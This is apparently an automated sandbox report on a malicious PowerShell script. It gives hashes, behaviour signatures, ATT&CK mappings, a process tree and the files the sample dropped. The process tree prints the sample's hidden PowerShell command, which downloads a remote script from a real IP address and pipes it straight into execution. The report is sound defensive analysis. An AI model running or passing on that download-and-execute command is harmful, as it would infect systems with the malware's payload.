ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a

Resubmissions

02-01-2025 15:41

250102-s4q41awrh1 8

02-01-2025 15:38

250102-s248vazkgq 10

Analysis

max time kernel
17s
max time network
19s
platform
windows10-2004_x64
resource
win10v2004-20241007-it
resource tags

arch:x64arch:x86image:win10v2004-20241007-itlocale:it-itos:windows10-2004-x64systemwindows
submitted
02-01-2025 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malicious_script_1.ps1
Size

2KB
MD5

a19cff86bcb8ba356ca034582a53f870
SHA1

d9a1cf4e9125ab420ebb614f67cb81c6efed1afb
SHA256

ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a
SHA512

4c5e9fb74d890d1b69f1ebc2fc5daae20229f69bee3f4a1e26b8f9465812f39555de5e15dcbda7b1fc3a6c6042dca05d57b4591cd2f545935d8d5e4a75d4e9a6

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	3488	powershell.exe
17	4052	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3488	powershell.exe
4052	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1316	Package.exe

Loads dropped DLL 1 IoCs

pid	Process
1316	Package.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4064	1316	WerFault.exe	84

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Package.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1316	Package.exe
1316	Package.exe
1316	Package.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3488 wrote to memory of 3896	3488	powershell.exe	83
PID 3488 wrote to memory of 3896	3488	powershell.exe	83
PID 3896 wrote to memory of 1316	3896	cmd.exe	84
PID 3896 wrote to memory of 1316	3896	cmd.exe	84
PID 3896 wrote to memory of 1316	3896	cmd.exe	84
PID 1316 wrote to memory of 2312	1316	Package.exe	85
PID 1316 wrote to memory of 2312	1316	Package.exe	85
PID 1316 wrote to memory of 2312	1316	Package.exe	85
PID 2312 wrote to memory of 4052	2312	cmd.exe	87
PID 2312 wrote to memory of 4052	2312	cmd.exe	87
PID 2312 wrote to memory of 4052	2312	cmd.exe	87
PID 4052 wrote to memory of 3752	4052	powershell.exe	88
PID 4052 wrote to memory of 3752	4052	powershell.exe	88
PID 4052 wrote to memory of 3752	4052	powershell.exe	88
PID 3752 wrote to memory of 980	3752	csc.exe	89
PID 3752 wrote to memory of 980	3752	csc.exe	89
PID 3752 wrote to memory of 980	3752	csc.exe	89
PID 4052 wrote to memory of 2244	4052	powershell.exe	95
PID 4052 wrote to memory of 2244	4052	powershell.exe	95
PID 4052 wrote to memory of 2244	4052	powershell.exe	95
PID 4052 wrote to memory of 4180	4052	powershell.exe	96
PID 4052 wrote to memory of 4180	4052	powershell.exe	96
PID 4052 wrote to memory of 4180	4052	powershell.exe	96
PID 4052 wrote to memory of 232	4052	powershell.exe	97
PID 4052 wrote to memory of 232	4052	powershell.exe	97
PID 4052 wrote to memory of 232	4052	powershell.exe	97
PID 4052 wrote to memory of 1700	4052	powershell.exe	98
PID 4052 wrote to memory of 1700	4052	powershell.exe	98
PID 4052 wrote to memory of 1700	4052	powershell.exe	98
PID 4052 wrote to memory of 3104	4052	powershell.exe	99
PID 4052 wrote to memory of 3104	4052	powershell.exe	99
PID 4052 wrote to memory of 3104	4052	powershell.exe	99

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious_script_1.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Windows\Temp\Package.exe
    C:\Windows\Temp\Package.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4052
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ao2i5prl\ao2i5prl.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3752
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC40B.tmp" "c:\Users\Admin\AppData\Local\Temp\ao2i5prl\CSC49CB1438D3084D8BBE769D6B1A4E09F.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:980
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2244
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4180
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:232
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1700
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3104
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 688
      4⤵
      Program crash
      PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1316 -ip 1316
1⤵
PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb4d127b8a6f84a1cee423c5e3e3a51d

SHA1
c55263a8ff097067f2393ce2120801a445fd1949

SHA256
d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514

SHA512
45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC40B.tmp

Filesize
1KB

MD5
43ec07121a4b653d40fcc6988f1f48e6

SHA1
faea921ed42952c408db3330a2c0314810e0d8ea

SHA256
71ea0dcdcdbc900f89b812dcb947b1aa494766012274b5d70ae5e68fe222bc22

SHA512
cc6e08914af877ae348de9b87701d84a1d17c9870fdd2c23ed95c639a18d9d7481d6fcb4439451c464c586d0aaef9dc5d8341f85da1d4bfbd3f16723cb75f94b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx01sldy.izk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ao2i5prl\ao2i5prl.dll

Filesize
9KB

MD5
cd868f624119ed8ab34729ee295ba28a

SHA1
e8f31162bdc73b12a9cfc68c6fbe4cca7742805b

SHA256
a3caf249209d5ee6efdd915f94e7e4ef5c2a9fc511b9aa55acf6a335b5e8943e

SHA512
3c9a6d9b4b2d8bfcb4c3910e6342b526d0d0efed2d0e537f95acfc90411a179e54921236c7df040214f6a0237328077c5aa507897c7f570e9bfb1955bed9cc8e

Download Submit
C:\Windows\Temp\IVIEWERS.DLL

Filesize
88KB

MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8

SHA1
109e32187254b27e04ef18bbe1b48fad42bca841

SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

Download Submit
C:\Windows\Temp\Package.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ao2i5prl\CSC49CB1438D3084D8BBE769D6B1A4E09F.TMP

Filesize
652B

MD5
2cce3cfffa5ba0a0a9c27495f80b3936

SHA1
f191de1ba1b90166cd5f7fa51297bbba0458114a

SHA256
3013be28ae25ea0569ddea990799b1347860ccd106c2fc91f43f0a77a69a8022

SHA512
d19ffec0efa854826349f2810013dcf54527f88fbb5c0e1ea8526c8b9dc9af595334892e5eef9311ba3a8a89d111f88716dd4c996e9ea510da9940ae933061bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ao2i5prl\ao2i5prl.0.cs

Filesize
10KB

MD5
3fa79decff8805745cea8116d9bb2643

SHA1
92343c5fa2c768b964ae3a4e9136e5d7193e8558

SHA256
e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

SHA512
5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ao2i5prl\ao2i5prl.cmdline

Filesize
204B

MD5
ad4d2e6f46b99523862522b8b4d5c9ce

SHA1
a82e538ac99558fcc8aaff11c4500338aed44dc4

SHA256
ec979de9ba575b0bb5b8ae98a37dceb0b2b47e94ab06ab80fc646c7c78075988

SHA512
af184d57f7e4b7d0749b7e205acc015407f53e05b86f0a7d4eef7b363c5dcf23e1bc54a14f78e2fe972d3ef49e03cc176cc4d78a7c61bece87241d7d879fcd4e

Download Submit
memory/3488-25-0x00007FFE6B390000-0x00007FFE6BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3488-19-0x0000024B313F0000-0x0000024B3140E000-memory.dmp

Filesize
120KB

Download
memory/3488-13-0x00007FFE6B390000-0x00007FFE6BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3488-12-0x0000024B310A0000-0x0000024B310B0000-memory.dmp

Filesize
64KB

Download
memory/3488-2-0x0000024B310C0000-0x0000024B310E2000-memory.dmp

Filesize
136KB

Download
memory/3488-1-0x0000024B31120000-0x0000024B311A2000-memory.dmp

Filesize
520KB

Download
memory/3488-16-0x0000024B313D0000-0x0000024B313E4000-memory.dmp

Filesize
80KB

Download
memory/3488-0-0x00007FFE6B393000-0x00007FFE6B395000-memory.dmp

Filesize
8KB

Download
memory/3488-15-0x00007FFE6B390000-0x00007FFE6BE51000-memory.dmp

Filesize
10.8MB

Download
memory/3488-14-0x0000024B314C0000-0x0000024B315C2000-memory.dmp

Filesize
1.0MB

Download
memory/4052-31-0x0000000005800000-0x0000000005822000-memory.dmp

Filesize
136KB

Download
memory/4052-44-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/4052-45-0x0000000006010000-0x0000000006112000-memory.dmp

Filesize
1.0MB

Download
memory/4052-43-0x0000000005B80000-0x0000000005ED4000-memory.dmp

Filesize
3.3MB

Download
memory/4052-47-0x0000000006190000-0x00000000061AE000-memory.dmp

Filesize
120KB

Download
memory/4052-48-0x0000000006230000-0x000000000627C000-memory.dmp

Filesize
304KB

Download
memory/4052-49-0x00000000079F0000-0x000000000806A000-memory.dmp

Filesize
6.5MB

Download
memory/4052-50-0x0000000006690000-0x00000000066AA000-memory.dmp

Filesize
104KB

Download
memory/4052-51-0x0000000007730000-0x0000000007744000-memory.dmp

Filesize
80KB

Download
memory/4052-52-0x0000000007760000-0x000000000776E000-memory.dmp

Filesize
56KB

Download
memory/4052-33-0x0000000005A10000-0x0000000005A76000-memory.dmp

Filesize
408KB

Download
memory/4052-32-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/4052-30-0x0000000004F30000-0x0000000004FB2000-memory.dmp

Filesize
520KB

Download
memory/4052-29-0x00000000050D0000-0x00000000056F8000-memory.dmp

Filesize
6.2MB

Download
memory/4052-28-0x00000000049E0000-0x0000000004A16000-memory.dmp

Filesize
216KB

Download
memory/4052-65-0x0000000007770000-0x0000000007778000-memory.dmp

Filesize
32KB

Download